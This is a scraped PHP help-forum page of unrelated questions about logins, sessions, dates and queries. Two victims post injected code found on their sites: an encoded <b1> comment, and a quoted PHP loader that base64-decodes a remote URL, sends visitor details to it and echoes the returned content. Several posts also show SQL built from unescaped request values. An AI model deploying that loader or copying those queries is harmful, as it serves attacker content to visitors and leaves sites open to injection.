|
PHP - Strange <b1> Html Tag?
I recently noticed some odd HTML appear in some of the websites I host. Not all of them are run on a CMS but the majority (but not all) are running through the same FTP account.
I've searched everywhere for documentation, forums, notes on this particular exploit but haven't been able to find anything. Essentially, there is a small HTML snippet (see below) that appears right before the </html> tag. It's really odd and the characters inside the <b1> are all different strings. Here's the code that's appearing: Code: [Select] <b1><!--6FY8rhRLeNoNyVsOwiAQBdAdca0PXE5DYVKngSkZrsG4ej2/B80UJt+FlytuMcbnHbmqHEcoMnS3r9aaRshnw5QN+TT+F7NMUFqviTLgXCnuyei6vU3WY3lArcgn9Ff/AVyxJcZ=--></b1> It's evident that the code is some type of exploit but I'm not sure how deep this goes. Anyone heard of anything like this, or have any idea of what the potential issues that could occur? Thanks for your help! -suess0r Similar Tutorials<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <?php session_start(); ini_set('display_errors', 'On'); error_reporting(-1); //Connect to Database and Check cookies for logged in user $db = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS); mysql_select_db(MYSQL_DB_NAME); if (!isset($_GET['act'])) { if (!isset($_POST['act'])) { $act = 'idx'; } if (isset($_POST['act'])) { $act = mysql_real_escape_string($_POST['act']); } } if (isset($_GET['act'])) { $act = mysql_real_escape_string($_GET['act']); } If ($act == 'login' && $_GET['CODE']=='1') { $usernameUsed = mysql_real_escape_string($_POST['Username']); $passwordUsed = mysql_real_escape_string($_POST['Password']); $SaltPassword = MEMBER_PASS_SALT_1.$passwordUsed.MEMBER_PASS_SALT_2; $HashPassword = md5($SaltPassword); $QueryLogin = "SELECT * FROM ".MEMBER_LOGIN_TABLE." WHERE username='{$usernameUsed}' AND password='{$HashPassword}'"; $LoginResult = mysql_query($QueryLogin); if (mysql_num_rows($LoginResult) > 0) { $UserID = mysql_result($LoginResult, 0, 'user_id'); $Id = uniqid(); $IdQry = "UPDATE ".MEMBER_LOGIN_TABLE." SET `unique_id`='{$Id}' WHERE user_id='{$UserID}'"; $IdRes = mysql_query($IdQry, $db); setcookie('RAYTH_MEMBER_ID', $Id, time()+2592000); } } If ($act == 'logout' && $_GET['CODE'] == '1') { setcookie('RAYTH_MEMBER_ID', "", time()-3600); } if (isset($_COOKIE['RAYTH_SKIN'])) { $Skin = $_COOKIE['RAYTH_SKIN']; } Else { $Skin = 'redskin'; } if (isset($_COOKIE['RAYTH_MEMBER_ID'])) { $Id = mysql_real_escape_string($_COOKIE['RAYTH_MEMBER_ID']); $MemIdQry = "SELECT user_id FROM ".MEMBER_LOGIN_TABLE." WHERE `unique_id`='{$Id}'"; $memidres = mysql_query($MemIdQry, $db); $memidnum = mysql_num_rows($memidres); If ($memidnum < 1) { setcookie('RAYTH_MEMBER_ID', '', time()-3600); } Else { $memid = intval(mysql_result($memidres, 0, 'user_id')); } } if (isset($memid)) { $query_meminfo = "SELECT * FROM ".MEMBER_PROFILE_TABLE." WHERE `user_id`='{$memid}'"; $query_result = mysql_query($query_meminfo, $db); $MemName = mysql_result($query_result, 0, 'display_name'); $MemGroup = mysql_result($query_result, 0, 'Group'); $AdsEnabled = mysql_result($query_result, 0, 'ads_enabled'); $UserLevel = intval(mysql_result($query_result, 0, 'user_level')); $LevelQuery = "SELECT group_level FROM ".MEMBER_GROUPS." WHERE group_id='{$MemGroup}'"; $LevelResult = intval(mysql_result(mysql_query($LevelQuery, $db), 0, 'group_level')); If ($UserLevel < $LevelResult) { $MemLevel = $LevelResult; } Else { $MemLevel = $UserLevel; } } else { $MemLevel = 0; $AdsEnabled = 'yes'; } ?> <html> <HEAD> <title>Rayth.Info ..::Home::..</title> <?php $File = './skins/'.$Skin.'/'.$Skin.'.php'; If (file_exists($File)) { include("./skins/{$Skin}/{$Skin}.php"); } Else { include("../skins/{$Skin}/{$Skin}.php"); } ?> Ok this code is the Headers code which checks if user is logged in, what skin to load etc. It is also used in the forum (so used in home and forum) via php include. Now somethin strange happens. If I use the home page to login (Rayth.Info) it logs me in for both home page and forum (rayth.info/forum) Now, if I then logout, and goto the forum, relogin, it doesn't log me in on the home page. Both pages use the same login/logout/register forms by php include and the same headers.php by include so I cant see any reason why this is happening. The cookie is obviously being set when user logs in since it sees them logged in on one page. So I have a client that wants me to add a function to her site that when she clicks a mailto href on a page to spawn an email child, some canned data chunk gets inserted into a form's textarea field.. something like: "Email sent to blah@blah.com on 8/14/14".
I'm drawing a blank on how this might be handled.. any ideas out there??
i have a form here that redirect to : "proc/edit.php?edit=<?php echo urlencode($function_name);?>" Code: [Select] <?php require_once("includes/functions.php");?> <?php session_start(); if (isset($_SESSION["user_name"])) { require_once("includes/connection.php"); if(isset($_GET['functions'])){ $function_name=$_GET['functions']; $function_type=$_GET['type']; $query = "SELECT * FROM functions WHERE function_name = '{$function_name}' "; $result = mysql_query($query,$connection); if($result){ $row = mysql_fetch_array($result, MYSQL_ASSOC); $function_description=$row['function_description']; ?> <html> <head> <title>Edit Your function</title> </head> <body> <form name="edit_function_n" action="proc/edit.php?edit=<?php echo urlencode($function_name);?>" method="get"> Edit Your function name : <input type="text" name="new_function_name"/><br/><br/> Edit Your description here :<br/><br/> <textarea name="new_function_description" rows="10" cols="30"></textarea><br/><br/> <input type="submit" value="Change" /><br/><br/> </form> </body> </html> <?php } elseif(!$result){ redirect("errors/error_db.html");} } } else { redirect("main.php?error=log"); } //close connection! mysql_close($connection); ?> AND i have a proc php file that UPDATE the database with the new form variables and then redirect to show.php Code: [Select] <?php require_once("../includes/functions.php");?> <?php session_start(); if (isset($_SESSION["user_name"])) { require_once("../includes/connection.php"); //ignore this , this is for deleting! if(isset($_GET['delete'])){ //warning : using urldecode here is wrong cuz $_GET[var]; is already decoded! $function_to_delete=$_GET['delete']; $function_type=$_GET['functions']; $query="DELETE FROM functions WHERE function_name='{$function_to_delete}' "; $result = mysql_query($query, $connection); if(!$result){redirect("../errors/error_db.html");} elseif($result){ redirect("../show.php?functions={$function_type}&delete=suc"); }} //the place for edit ! elseif(isset($_GET['edit'])){ $old_function_name=$_GET['edit']; $new_function_name=$_POST['new_function_name']; $new_function_description=$_POST['new_function_description']; $query="UPDATE functions SET function_name='{$new_function_name}', function_description='{$new_function_description}' WHERE function_name='{$old_function_name}' "; $result = mysql_query($query, $connection); if(!$result){redirect("../errors/error_db.html");} elseif($result){redirect("../show.php?functions='{$function_type}'&edit=suc");} } } else { redirect("../main.php?error=log"); } ?> <?php //close connection! mysql_close($connection); ?> The problem is i get redirect to a strange link that never existed and i never pointed to : /proc/edit.php?new_function_name=($new_function_name)&new_function_description=($new_function_description) with the variables replaces with their values and with no database update whatsoever! I tried a lot with it with no result could someone help me out here! Ok, not sure what the problem is....hard to explain. I am trying to setup a login script but I get the normal: Warning: session_start() [function.session-start]: Cannot send session cache limiter error code. I have no white space above to cause problem. I have used this same code written by Jpmaster77 on a number of sites. What the strange thing is it also messed up a couple of my css text boxes. See the difference: http://www.monstersgonewild.ca/index.php - Problem http://www.monstersgonewild.ca/index1.php - Without session() I would post the code of the original page but it is 600+lines and growing. Anybody have any ideas? So i am currently coding database connection class and i have encountered very strange behavior from my script. base.class.php: Code: [Select] <?php class base{ private $settings; function get_settings(){ $settings["dbhost"] = 'localhost'; $settings["dbuser"] = '*****'; $settings["dbpass"] = '*****'; $settings["dbname"] = 'core'; return $settings; } } ?> database.class.php Code: [Select] <?php require_once 'base.class.php'; class database extends base{ private $query_now; private $link; public function __construct(){ $settings = base::get_settings(); $dbhost = $settings["dbhost"]; $dbuser = $settings["dbuser"]; $dbpass = $settings["dbpass"]; $dbname = $settings["dbname"]; $this->link = mysql_connect($dbhost, $dbname, $dbpass) or die ("Could not connect to the mysql database"); mysql_select_db($dbname, $this->link) or die ("Could not select the database"); } function query($query){ $this->query_now = $query; return mysql_query($query, $this->link); } function getArray($result){ return mysql_fetch_array($result); } } ?> When i try to create an instance of database class, i get mysql_connect error. I have tried to echo my array and it seems that correct information is being passed over. Now the strange thing is if i remove my password from the base class i don't get a mysql_connect error but this time instead i get "Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'core'@'localhost' (using password: YES) " In case you are wondering, does my mysql database user has a password, the answer is: yes for sure... (Also i have tried to setup a simple script for connecting to my database and everything worked fine) So any ideas? I'm returning a table row that contains information about a file, but it seems in IE versions older than 10, it is cutting off some of the returned json when being used.
The data is being returned properly as seen in the following json:
{"file_name":"<i class='video'><\/i> <a href=\"\/Development\/test(4).mp4\" class=\"is_file\" target=\"_blank\">test(4).mp4<\/a>"}
But when you use it, it cuts off the html. A simple alert will return
</i> test(4).mp4</a>and same when appending it and the sort. It is also happening for another part of HTML that is being returned properly in the json. It is working for everything else that is returned. I have been searching around for a very long time trying to find why this is happening. Has anyone other than me encountered this? Im installing and testing a web application, and im having a strange bug that annoyes me because it dint have any sense and also it dont affects really to the web functionality: if($_POST["eliminar"]==""){ $consulta='SELECT * FROM impressora where Activa=0'; $result=mysql_query($consulta,$conexion); echo"<table align=CENTER class='sample'>"; echo"<p align=center>LLISTA D'IMPRESSORES INACTIVES.</p>"; printf("<th>MODEL</th><th>MARCA </th>"); while($fila=mysql_fetch_array($result,MYSQL_ASSOC)){ echo"<tr>"; echo "<td>" . $fila["Model"] . "</td>"; echo "<td>" . $fila["Marca"] . "</td>"; echo"</td>"; if($_SESSION["admin"]!=0){ ?> <form method= "post" ACTION="impressores_inactives.php?idr=<?php echo($fila["Id_impressora"])?>"> <td colspan="2"><INPUT TYPE ="SUBMIT" NAME="eliminar" VALUE="Eliminar"></td> </form></td> <?php } echo "</tr>"; } echo"</table>"; }else{ echo 'eliminado'; echo $_POST["eliminar"]; //BORRAMOS DE LA BBDD LA IMPRESSORA $consulta="delete from impressora where Id_impressora='".$_GET["idr"] ."'"; $result=mysql_query($consulta); echo "<meta http-equiv=Refresh content=\" ; url=../Impressores/impressores_inactives.php\">"; } The problem is that php say that eliminar is undefinded, and if i test $_POST it says its empty. See that eliminar is the name of the submit post and its checked for a function that deletes a item. The problem is that script is actually working. I can delete the printer but with that error... and if i test the value of eliminar is always empty. Ask for any other explanation without a problem , the code is in spanish. HI every one I have uploaded a web site 2 month ago and It worked well . Since 1 week ago , it shows me this error and I don't know what is the problem . I have completely uploaded my web site again but it hasn't make different . This is the address birjand-niazmandi.com . I have uploaded class.phpmailer.php again but I can't understand what is the problem ? How can I solve it ? thanks Hey guys, First of all thanks in advance for all the help you can give me. I'm using a php shopping script called plaincart to create a webstore. All is fine but the admin part is not working properly. When i go to http://localhost/admin it redirects to http://localhost/admin/admin/login.php The index.php is in the root of the server and the admin files are in a folder called admin... What is wrong? Please tell me if you need any code. Thank you OK, this is a strange one I am hoping someone can help with. I have a file with a heap of functions which work fine. This file is included in my other files, and the function to display the content is called. For example I include the master file in guestbook.php, which calls showGuestbook(). Same with contact.php, it calles showContact(); etc. The file is outside the web root of the website calling it. So I went to add another function called downloadFile(). When I try to call the function, it gives me the "call to undefined function" error. I have tried renaming it to a few diff things, same error. So I thought there could be a brace error somewehere in the file. This is the strange bit.... When I put that function at the top of the file, the page seems to fail to parse. None of the functions are available... The function so far is simply: function downloadFile() { echo "Download File"; } Can anyone shed some light on this strange behaviour, especially the errors that occur just because I move the code higher up the file. I have something strange going on with sessions set after a user logs in. After posting the form, the following code (only part of the log in script) correctly assigns the users ID to $_SESSION['id'] but after a while it starts showing up as the users level ($_SESSION['level']). I have rechecked all of my code to see if something mistakenly assigns the level to $_SESSION['id'] but everything seems fine. I am going to rewrite the log in script today, as I am sure that I can streamline it but wondered if anyone can give any advice on what it happening here to make sure I do not fall into the same trap! Thanks Steve $username = mysql_escape_string($_POST['Lname']); $password = mysql_escape_string(md5($_POST['Lpassword'])); $search = mysql_query("SELECT userid, username, password, active, level FROM users WHERE username like binary '".$username."' AND password='".$password."' AND active='1'") or die(mysql_error()); $match = mysql_num_rows($search); $level = mysql_fetch_assoc($search); if($match > 0) //The username and password is correct {//START MANUAL LOGIN & SET SESSION VARIABLES $_SESSION['user'] = $username; $_SESSION['level'] = $level['level']; $_SESSION['loggedin'] = '1'; $_SESSION['id'] = $level['userid']; Current time when testing was: 1291064453 I run the following: echo date('m/d/y', strtotime('first day', 1291064453)); Expecting: 11/1/10 What I actually get: 11/30/10 Can anyone explain this? When I used Amazon API to capture a product details using the well known code (http://www.chipdir.nl/amazon/aws_signed_request.phps), It made this error, and consequently lots of CPU usage which made my server down. Code: [Select] [14-Mar-2011 20:38:01] PHP Warning: simplexml_load_string() [<a href='function.simplexml-load-string'>function.simplexml-load-string</a>]: uestProcessingTime>0.0009990000000000</RequestProcessingTime></OperationRequest> in /home/laptop/public_html/jewelryaccessories.us/amazon.php on line 52 Line 51 - 60 of amazon.php is Code: [Select] // parse XML $pxml = simplexml_load_string($response); if ($pxml === False) { return False; // no xml } else { return $pxml; } I hope this is in the correct section. My host and I have spent many hours on this and can find no reason for this error Only MSIE creates the problem and it only occurs on the index page on load and on refresh. All other browsers are fine Scenario: on loading in ie 7,8 I get these error messages Error messages Error Log - [Sat Nov 12 23:49:44 2011] [error] [client 60.230.xxx.xx] File does not exist: /hsphere/local/home/MYDOMAIN/MYDOMAIN.com.au/none Transfer Log - 203.26.xxx.xx - - [12/Nov/2011:23:49:00 +0000] "GET /none HTTP/1.1" 302 233 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" Always followed by ...... 203.26.xxx.xx - - [12/Nov/2011:23:49:00 +0000] "GET /error_page.php HTTP/1.1" 200 13196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" Although it calls GET /error_page.php it does not go to the error_page.php but loads the index page without any further errors. Any help is greatly appreciated Cheers The code below was inserted into every single index.php on one of my clients sites. It went through and every single index.php page (in each folder) had that following code put in. It was strange. As far as I can tell there are no FTP logs, besides my own IP. This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a full security audit yet. What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <? is inserted right after it. I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange. Any advice on how this is generally done, and anyone with similar issues? Code: [Select] <? require_once('security.inc.php'); ?><? if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> Can anyone help? the date is pulling through without a value shown in bold below. `Timesheet_start_date` >= '2011-02-10 00:00:00' AND `Timesheet_end_date` <= '1970-01-01 00:00:00' ORDER BY id DESC here is my code: Code: [Select] $smalldate = $_POST['small']; $largedate = $_POST['large']; $types[] = (isset($_POST['small']) && strlen(trim($_POST['small'])) > 0) ? "`Timesheet_start_date` >= '".date('Y-m-d',strtotime($smalldate))." 00:00:00'" : ''; $types[] = (isset($_POST['large']) && strlen(trim($_POST['large'])) > 0) ? "`Timesheet_end_date` <= '".date('Y-m-d',strtotime($largedate))." 00:00:00'" : ''; i've echo the $largedate and there is a value in there? Using phpMyAdmin I loaded 6 test records with the id set to auto_increment and it loaded all the data correctly with id # 1-6. Then from somewhere it got the number 333353 and auto_increments it as the value for the id. So now I have id's 1-6 and 333353, 333354, ect. For every record I add it increments it. I deleted all but records 1-6 and tried again but it has the last value of 3333xx stored somewhere and increments it. Deleted them again, closed the program, came back and it still does it. Im creating a function for executing a system command. The idea is to show the command return. I use pre to show it, so i created a general function iPre that echos a string with that tag. The problem is that this code dont work. function compComando($com) { return escapeshellcmd($com); } function ejecComando($com) { $return = passthru(compComando($com)); if ($return) { return $return; } else { pe(); } } function iPre($txt) { echo '<pre>'; echo $txt; echo '</pre>'; } iPre(ejecComando('dir C:')); But if i call this simple code it works. Why? echo '<pre>'; echo ejecComando('dir C:'); echo '</pre>'; Here its shown well formatted, in the other no. I suppose thats something relating passing the string to the function...? I have the most simple loop ever on this earth an its doin strange things. There are 6 rows in my cache table. I have a query to echo the rows onto the page with a loop. Now Im try to limit the rows returned to 1 row. simples eh. $FetchCacheq = mysql_query("SELECT * FROM cacheInfo LIMIT 1") or die('cache error'); <table width="480" border="0" cellpadding="0" cellspacing="5"> <tr> <td colspan="2" valign="baseline"><strong>Caches you have found</strong></td> </tr> <?php do { ?> <tr> <td width="250" height="31" align="left" valign="middle"><?php echo $row['cacheName'];?></td> <td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td> </tr> <?php } while($row = mysql_fetch_assoc($FetchCacheq));?> </table> The problem I have is its showing two rows. Here is the source code from the page <table width="480" border="0" cellpadding="0" cellspacing="5"> <tr> <td colspan="2" valign="baseline"><strong>Caches you have found</strong></td> </tr> <tr> <td width="250" height="31" align="left" valign="middle"></td> <td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td> </tr> <tr> <td width="250" height="31" align="left" valign="middle">Your Life in Their Hands</td> <td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td> </tr> </table> as you can see one of the rows doesnt even have the cache name in it!!! please help im really confused. |
|||||||